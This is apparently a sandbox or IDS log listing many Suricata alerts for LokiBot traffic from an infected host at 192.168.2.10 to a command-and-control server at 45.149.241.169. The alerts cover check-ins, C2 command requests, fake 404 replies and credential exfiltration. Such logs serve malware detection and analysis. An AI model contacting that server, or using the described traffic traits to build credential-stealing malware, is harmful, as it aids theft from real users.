                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49725 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49726 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49717 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49727 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49725 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49735 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49717 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49756 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49726 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49727 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49735 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49756 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49735 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49744 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49718 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49757 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49744 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49760 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49717 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49718 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49760 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49760 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49753 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49753 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49727
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49767 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49767 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49764 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49764 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49764 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49767 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49726
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49753 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49761 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49749 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49744 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49749 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49756
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49718
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49717 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49735 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49757 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49735 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49757 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49708 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49764 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49761 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49767 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49734 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49720 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49767 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49733 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49761 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49753 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49753 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49744 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49741 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49741 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49741 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49717 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49744 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49764 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49734 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49720 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49720 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49759 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49761 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49761 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49758 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49743 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49733 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49746 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49736 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49757 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49752 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49761
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49708 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49708 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49749 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49734 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.10:49708 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49720 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49733 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49725 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49746 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49735
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49730 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49746 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49723 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49733 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49723 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49733 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49730 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49752 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49752 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49730 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49716 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49716 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49716 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49725 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49752 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49716 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49725 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49716 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49717
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49760 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49741 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49741 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49742 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49719 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49742 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49759 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49760 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49715 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49730 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49752 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49760
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49730 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49734 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49716
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49734 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49746 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49746 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49721 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49721 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49719 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49721 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49719 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49730
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49742 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49746
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49758 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49758 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49764
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49739 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49742 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49758 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49742 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49739 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49737 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49754 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49749 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49742
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49757 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49741
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49744
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49721 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49719 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49719 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49719
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49788 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49788 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49788 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49720 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49788 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49788 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49743 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49743 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49733
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49758 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49743 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49722 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49755 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49743 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49754 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49751 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49758
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49751 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49751 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49797 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49725
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49732 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49795 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49795 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49732 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49795 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49736 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49721 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49736 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49767
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49751 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49788
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49751 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49781 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49720
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49800 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49736 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49800 -> 45.149.241.169:80
